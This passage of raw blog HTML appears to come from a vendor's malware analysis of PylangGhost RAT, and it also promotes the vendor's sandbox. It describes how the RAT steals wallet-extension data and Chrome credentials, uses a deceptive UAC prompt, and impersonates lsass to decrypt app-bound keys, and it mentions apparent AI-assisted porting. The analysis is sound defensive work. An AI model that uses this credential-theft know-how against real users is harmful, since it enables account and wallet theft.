https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8-289x300.png 289w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8-768x796.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8-370x384.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8-270x280.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8-740x767.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8.png 1240w\" sizes=\"(max-width: 987px) 100vw, 987px\" \/><figcaption class=\"wp-element-caption\"><em>Function to open a reverse shell or run arbitrary commands<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>You probably remember that command.py imports two other custom modules: <strong>util.py and auto.py<\/strong>. Let&#8217;s review them as well.&nbsp;<\/p>\n\n\n\n<p>Module util.py implements three functions:&nbsp;<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-247\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"4\"\n           data-wpID=\"247\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell \"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        Function\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell \"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        Description\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        com0715press\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Compresses files in-memory as .tar.gz\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        decom0715press\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Extracts .tar.gz files from memory to disk\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        valid0715relPath\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Validates routes to prevent path transversal\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-247'>\ntable#wpdtSimpleTable-247{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-247 td, table.wpdtSimpleTable247 th { white-space: normal !important; }\n<\/style>\n\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"945\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9-1024x945.png\" alt=\"\" class=\"wp-image-15302\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9-1024x945.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9-300x277.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9-768x709.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9-370x342.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9-270x249.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9-740x683.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/9.png 1432w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Auxiliary functions from util.py<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Finally, the last and most critical module:&nbsp;<strong>auto.py<\/strong>.&nbsp;<\/p>\n\n\n\n<p>This module implements two key functions:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>AutoGatherMode: <\/strong>Collects configuration data from cryptocurrency browser extensions such as MetaMask, BitKeep, Coinbase Wallet, and Phantom.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>AutoCookieMode:<\/strong> Extracts login artifacts, including credentials and cookies, from Google Chrome.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>The&nbsp;autoGatherMode&nbsp;function searches for the user\u2019s Google Chrome profile directory (AppData\\Local\\Google\\Chrome\\User Data), starting with the&nbsp;<strong>Default<\/strong>&nbsp;profile and then enumerating others. It compresses the configuration directories of the targeted extensions into a single archive named&nbsp;gather.tar.gz&nbsp;and exfiltrates it for manual analysis, with the goal of enabling account takeover or compromising cryptocurrency wallets.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-1024x576.png\" alt=\"\" class=\"wp-image-15303\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-1024x576.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-300x169.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-768x432.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-1536x864.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-370x208.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-270x152.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10-740x416.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/10.png 1976w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Exfiltrating Google Chrome Profiles in a compressed file<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>With the rise of information-stealing malware, browser vendors have introduced various countermeasures to protect sensitive data such as password managers, cookies, and encrypted storage vaults. Chrome is no exception. To bypass these protections, the malware includes functions designed to check whether the user has administrative privileges and to retrieve Chrome\u2019s encryption key through different methods, depending on the browser version, as the protection mechanisms vary.&nbsp;<\/p>\n\n\n\n<p>The <strong>autoCookieMode <\/strong>function, on the other hand, starts by checking if the user has administrative privileges. If not, it relaunches itself using&nbsp;runas, triggering a UAC (User Access Control) prompt. The prompt is intentionally deceptive, it simply displays \u201cpython.exe\u201d as the requesting binary, providing no additional context or visual indicators. This subtle form of social engineering increases the likelihood of the user granting permission.&nbsp;<\/p>\n\n\n\n<p>If the prompt is accepted, the malware gains elevated privileges, which are necessary to interact with privileged APIs such as the&nbsp;<strong>Data Protection API (DPAPI)<\/strong>&nbsp;used to retrieve Chrome\u2019s encryption keys. If the user declines, the malware continues execution with the current user\u2019s privileges.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"529\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11-1024x529.png\" alt=\"\" class=\"wp-image-15304\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11-1024x529.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11-300x155.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11-768x397.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11-370x191.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11-270x139.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11-740x382.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/11.png 1520w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Malicious UAC prompt<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>It then creates a file named chrome_logins_dump.txt to store the extracted credentials. To do so, it accesses Chrome\u2019s Local State file, which contains either an encrypted_key (in v10) or an app_bound_encrypted_key (in v20+). These keys are not stored in plaintext but encoded in Base64 and encrypted using Windows DPAPI. While they are accessible to the current user, they require decryption before use.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"840\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12-1024x840.png\" alt=\"\" class=\"wp-image-15305\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12-1024x840.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12-300x246.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12-768x630.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12-370x303.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12-270x221.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12-740x607.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/12.png 1512w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Google Chrome Keys Harvesting<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>In Chrome v10, the encryption key is protected solely by the user\u2019s DPAPI context and can be decrypted directly. In Chrome v20 and later, the key is&nbsp;<strong>app-bound<\/strong>&nbsp;and encrypted twice \u2014 first with the machine\u2019s DPAPI context, and then again with the user\u2019s. To bypass this layered protection, the malware impersonates the&nbsp;lsass.exe&nbsp;process to temporarily gain&nbsp;<strong>SYSTEM<\/strong>&nbsp;privileges.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"597\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13-1024x597.png\" alt=\"\" class=\"wp-image-15306\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13-1024x597.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13-300x175.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13-768x448.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13-370x216.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13-270x157.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13-740x431.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/13.png 1342w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Impersonating lsass.exe<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>It then applies both layers of decryption, yielding a key blob which, once parsed, reveals the AES master key used to decrypt Chrome\u2019s stored credentials.&nbsp;<\/p>\n\n\n\n<p>Once the key is obtained by either method, the malware connects to the Login Data SQLite database and extracts all stored credentials, applying the corresponding decryption logic for v10 or v20 entries depending on the case.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"661\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-1024x661.png\" alt=\"\" class=\"wp-image-15307\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-1024x661.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-300x194.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-768x496.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-1536x991.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-370x239.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-270x174.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14-740x477.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/14.png 1742w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Credentials dumped by the process<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>At this point, it\u2019s game over for the victim.&nbsp;<\/p>\n\n\n\n<p>With the module functionality now understood, the next step is to examine the malware\u2019s core component:&nbsp;<strong>nvidia.py<\/strong>. Before diving in, here\u2019s a summary of the auxiliary functions contained in this module.&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>check_adminRole: Checks if the current process has administrative privileges using IsUserAnAdmin().&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>GetSecretKey: Extracts and decrypts the AES key used by Chrome (v10) from the Local State file using DPAPI.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>DecryPayload: Decrypts a payload using a given cipher.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>GenCipher: Constructs an AES-GCM cipher object using a given key and IV.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>DecryPwd: Decrypts v10-style Chrome passwords using AES-GCM and the secret key obtained via DPAPI.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>impersonate_lsass: Context manager that impersonates the lsass.exe process to gain SYSTEM privileges.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>parse_key_blob: Parses Chrome\u2019s v20 encrypted key blob structure to extract the IV, ciphertext, tag, and (if present) encrypted AES key.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>decrypt_with_cng: Decrypts data using the Windows CNG API and a hardcoded key name (\u201cGoogle Chromekey1\u201d).&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>byte_xor: Performs XOR between two byte arrays (used to unmask AES key in v20 key blobs).&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>derive_v20_master_key: Decrypts and derives the AES master key from parsed v20 Chrome blobs, supporting multiple encryption flags (AES, ChaCha20, masked AES).&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">From Recon to Full Control&nbsp;<\/h2>\n\n\n\n<p>Now, to the core component:&nbsp;<strong>nvidia.py<\/strong>.&nbsp;<\/p>\n\n\n\n<p>This module begins by registering a registry key to establish persistence, assigning a unique identifier (UUID) to the host, and creating a pseudo\u2013mutex-like mechanism via a&nbsp;.store&nbsp;file to prevent multiple instances from running simultaneously. It then enters a loop, continuously listening for new instructions from the C2 server. Additionally, it supports standalone execution with specific command-line arguments, enabling it to immediately perform actions such as stealing cookies or login data.&nbsp;<\/p>\n\n\n\n<p>Analysis in&nbsp;<strong><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=pylangghost_rat&amp;utm_term=060825&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a><\/strong>&nbsp;shows that all communication with the C2 servers is carried out over raw IP addresses, with no domain names used. While the traffic is not encrypted with TLS, it is at least obfuscated using RC4; a weak method, but still an added layer of concealment.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/app.any.run\/tasks\/275e3573-0b3e-4e77-afaf-fe99b935c510\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=pylangghost_rat&amp;utm_term=060825&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">View real case inside ANY.RUN sandbox<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"656\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-1024x656.png\" alt=\"\" class=\"wp-image-15308\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-1024x656.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-300x192.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-768x492.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-1536x985.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-2048x1313.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-370x237.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-270x173.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/15-740x474.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Traffic to the C2 Server<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>The sandbox quickly flags the traffic as suspicious. Because the malware uses the default&nbsp;python-requests&nbsp;User-Agent and sends multiple rapid requests, this pattern becomes a reliable detection indicator.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\">\nDetect threats faster with ANY.RUN\u2019s <span class=\"highlight\">Interactive Sandbox<\/span><br> See full attack chain in seconds for immediate response&nbsp;  \n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/app.any.run\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=pylangghost_rat&#038;utm_term=060825&#038;utm_content=linktoregistration#register\/\" target=\"_blank\" rel=\"noopener\">\nGet started with business email\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"510\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-1024x510.png\" alt=\"\" class=\"wp-image-15309\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-1024x510.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-300x149.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-768x382.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-1536x765.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-370x184.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-270x134.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16-740x369.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/16.png 2004w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Traffic is automatically marked as suspicious<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Another key observation: most of the malware artifacts used in this campaign register only 0 to 3 detections on VirusTotal, making them particularly stealthy. Fortunately,&nbsp;<strong>ANY.RUN<\/strong>&nbsp;immediately identifies these samples as 100\/100 malicious, starting with the initial&nbsp;update.vbs&nbsp;loader.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"440\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-1024x440.png\" alt=\"\" class=\"wp-image-15310\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-1024x440.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-300x129.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-768x330.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-1536x660.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-2048x880.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-370x159.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-270x116.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/17-740x318.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>update.vbs loader marked as malicious<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Other components, including&nbsp;nvidia.py, the main launcher, are also flagged instantly with a 100\/100 score, providing early warning against this evolving threat.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"438\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-1024x438.png\" alt=\"\" class=\"wp-image-15311\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-1024x438.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-300x128.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-768x328.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-1536x656.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-2048x875.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-370x158.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-270x115.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/18-740x316.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>nvidia.py loader marked as malicious<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>New malware, you say? Let\u2019s take a closer look.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Gophers, Ghosts &amp; AI&nbsp;<\/h2>\n\n\n\n<p>A variant of this sample was recently observed by other security laboratories, which noted strong similarities to&nbsp;<strong>GoLangGhost RAT<\/strong>. In fact, this appears to be a full reimplementation of that RAT in Python, but with a notable twist.&nbsp;<\/p>\n\n\n\n<p>Analysis revealed numerous linguistic patterns and unusual coding constructions, including dead code, large commented-out sections, and Go-style logic structures, suggesting that the port from Go to Python was at least partially assisted by AI tools.&nbsp;<\/p>\n\n\n\n<p>Ghosts, Gophers, Pythons, and AI, all converging in a single malware family. &nbsp;<\/p>\n\n\n\n<p>Let&#8217;s go to the ATT&amp;CK Matrix now, which ANY.RUN does automatically.\u00a0<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">PylangGhost RAT ATT&amp;CK Details&nbsp;<\/h2>\n\n\n\n<p>PylangGhost RAT shares several tactics, techniques, and procedures (TTPs) with its related families, <strong>OtterCookie<\/strong>,&nbsp;<strong>InvisibleFerret<\/strong>, and&nbsp;<strong>BeaverTail<\/strong> but also introduces some new ones:&nbsp;<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-248\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"4\"\n           data-wpID=\"248\"\n           data-responsive=\"0\"\n           data-has-header=\"0\">\n\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:33.333333333333%;                    padding:10px;\n                    \"\n                    >\n                                        T1036\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:33.333333333333%;                    padding:10px;\n                    \"\n                    >\n                                        Masquerading\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:33.333333333333%;                    padding:10px;\n                    \"\n                    >\n                                        Renames legitimate binaries such as\u00a0python.exe\u00a0to\u00a0csshost.exe.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1059\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Command and Scripting Interpreter\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Initiates execution by using\u00a0wscript.exe\u00a0to run\u00a0update.vbs\u00a0and\u00a0csshost.exe\u00a0to launch the\u00a0nvidia.py\u00a0loader.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1083\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Files and Directory Discovery\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Enumerates user profiles and browser extensions.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1012\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-bold\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Query Registry\u00a0       